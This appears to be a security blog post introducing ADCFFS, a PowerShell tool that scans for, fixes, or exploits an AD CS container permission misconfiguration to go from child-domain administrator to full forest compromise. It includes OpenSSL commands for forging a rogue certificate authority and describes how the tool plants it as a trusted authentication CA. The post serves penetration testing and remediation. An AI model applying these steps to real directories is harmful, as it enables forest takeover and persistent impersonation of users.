AD-CS-Forest-Exploiter : Mastering Security Through PowerShell For AD CS Misconfiguration

ADCFFS is a PowerShell script that can be used to exploit the AD CS container misconfiguration allowing privilege escalation and persistence from any child domain to full forest compromise.

The tool can also be used to first scan the forest to determine if it is vulnerable to the attack and can remedy the permission misconfiguration as well. More information on the exploit can be found in this whitepaper.

Requirements

Modules

The script relies on the AD-RSAT PowerShell module from Microsoft. This can be installed using the following command:

Add-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 -Online

Permissions

To determine if the forest is vulnerable, low-privileged AD access is required. However, in order to exploit the misconfiguration, your AD user must be a member of the Administrators group in a child domain in the forest.

Certificate Authority

In order to embed a rogue CA, you will have to generate the CA first. This can be done using OpenSSL and the following commands:

openssl genrsa -out fakeca.key 2048
openssl req -x509 -new -nodes -key fakeca.key -sha256 -days 1024 -out fakeca.crt
openssl x509 -outform der -in fakeca.crt -out fakeca.der
cat fakeca.key > fakeca.pem
cat fakeca.crt >> fakeca.pem
openssl pkcs12 -in fakeca.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out fakeca.pfx

The fakeca.der file should be copied to the Windows host from where ADCFFS will be executed. The fakeca.pfx file can be used with tooling such as Certipy to generate rogue certificates for the domain.

Usage

The functions of ADCFFS can be imported to Powershell using the Import-Module command. In total, there are three functions:

ScanContainerPermissions

The ScanContainerPermissions function will connect to ADSI and recover the ACL permissions of the containers configured during AD CS installation. If the misconfiguration of the BUILTIN\Administrator permission is found, it will be indicated that the forest is vulnerable to the attack.

RemedyContainerPermissions

The RemedyContainerPermissions function will connect to ADSI and remove the BUILTIN\Administrator permission from all AD CS containers, thus removing the installation misconfiguration.

AddCertificateTrusts

The AddCertificateTrusts function will exploit the misconfiguration by embedding the certificate of a rogue CA into both the NTAuthCertificates container and the first writeable container of a CertificateAuthority.

Once domain controllers perform a Group Policy update, the CA will be embedded as a trusted CA that is allowed to perform authentication.

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.